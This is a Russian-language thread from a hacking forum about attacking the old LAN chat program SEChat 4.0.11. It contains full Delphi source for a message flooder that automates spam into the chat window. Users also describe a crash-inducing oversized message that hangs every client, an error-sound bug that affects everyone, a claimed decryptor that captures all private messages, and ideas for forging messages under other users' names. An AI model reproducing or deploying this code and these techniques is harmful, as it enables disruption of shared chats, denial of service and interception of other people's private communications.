• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимость SEChat 4.0.11

Уязвимости есть...Они везде есть. Просто SeChat уже несколько лет не поддерживается разработчиками (они переключились на Vypress), посему и не ищут в нем ничего...
А это я бы даже флудером не назвал. Хотя нет, можно, с натяжкой...Это просто прога, которая за тебя в чат мессаги отправляет определенное количество раз через определенный промежуток времени. Написана на дельфи с применением WinAPI. Только вот размер экзешника мне не нраится...Компилировал из исходных текстов - получалось на 20 кб меньше. Лучше собрать самому ;)

Только вот размер экзешника мне не нраится...Компилировал из исходных текстов - получалось на 20 кб меньше.

ну во-1, что было то и вылажил, во-2 я не дурак чтобы вири класть, в-3 флдуер жёсткий.. я кидал 3 ляма соообщения... у меня комп вис :)

ну во-1, что было то и вылажил, во-2 я не дурак чтобы вири класть, в-3 флдуер жёсткий.. я кидал 3 ляма соообщения... у меня комп вис
братуха, я ж тебя ни в чем не обвиняю :) Мне просто интересно, почему флудер, собранный из одного и того же сорца на разных машинах весит по-разному. Может, компиляторы разные? Собирал Delphi7.
Согласись, если собирать троя, то 20 кб - существенная разница.
Флудер действительно рабочий...кстати, а с русскими никами и текстами он работать будет? Я не проверял пока что, но что-то сомнения есть...

Да можно и сюда, флудер небольшой ;)
Код:
program Projectflood;
{$APPTYPE CONSOLE}
uses SysUtils,  Windows,  Messages, Controls;
  var ButtonWnd:array[1..10] of integer;
    i, k, raz, w8:integer;
    msg:string;
     KeeperWnd:HWND;
begin
      if (FindWindow(0, 'SEChat 4.0.11Beta')<>0 ) then
begin
  writeln('Sechat naiden....');

KeeperWnd:=FindWindow(0, 'SEChat 4.0.11Beta');
     ButtonWnd[1]:=GetWindow(KeeperWnd, gw_Child);
       for i:=2 to 7 do
           begin
        ButtonWnd[i]:= GetWindow(ButtonWnd[i-1],gw_HWNDNext);
                end;
                writeln('Vvedite Soobschnie'); readln(msg);
                 writeln('skolko raz ?');    readln(raz);
                  writeln('c kakoy zaderzhkoi otpravlyaT ? ( 0 - bez zaderzhki) v millesekundax');
                   readln(w8);
                      for k:= 1 to raz do  begin
SendMessage(buttonWnd[2], WM_SETTEXT ,0, LParam(PCHAR(msg)));
SendMessage(buttonWnd[1], WM_KEYDOWN,  VK_RETURN ,  0 );

if (w8 > 0) then
   sleep(w8)

end;
   end
   else writeln('sechat ne nayden');
   sleep(2000);
   end.

Нашёл прикольный баг в чате! если написать /MSG " он выдаст звук ошибки не только тебе , а у всем !!! И если написать скрипт и в цикле вставлять эту команду, то сразу будет виден эффект !!!
И ещё нашёл один баг - переполнение буфера чата !

Так используй предыдущий флудер :)
А насчет переполнения поподробнее, как достиг, к чему приводит?

Если на доске повесить охрененно большое сообщение (лучше чтоб было без пробелов). То чат будет виснуть при входе в него и при просмотра доски, причём это происходит у всех. Иногда может сам вылететь :holloween:
Добавлено в [time]1151875456[/time]
Если на доске повесить охрененно большое сообщение (лучше чтоб было без пробелов). То чат будет виснуть при входе в него и при просмотра доски, причём это происходит у всех. Иногда может сам вылететь !

В сети можно найти SeChat 0.1 для Linux с исходниками под библиотеку Qt. Самое ценное там - алгоритм шифрования/дешифрования сообщений. Я сам элементарно написал дешифратор, который хватает все лички и вообще все пакеты, рассылаемые чатом.
Только формат протокола видно сильно изменился с тех времен. Опции идут не текстом, а просто какими-то значащими байтами. Лениво пока разбитаться, где там что. При наличии желания и прямых рук думаю несложно будет написать и анонимный флудер с левым ником, перехватывать либо подделывать чужие сообщения и т. д.

При наличии желания и прямых рук думаю несложно будет написать и анонимный флудер с левым ником
есть уже такое :)
Где бы только взять утилиту, позволяющую создавать пакеты для отправки в чат...

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх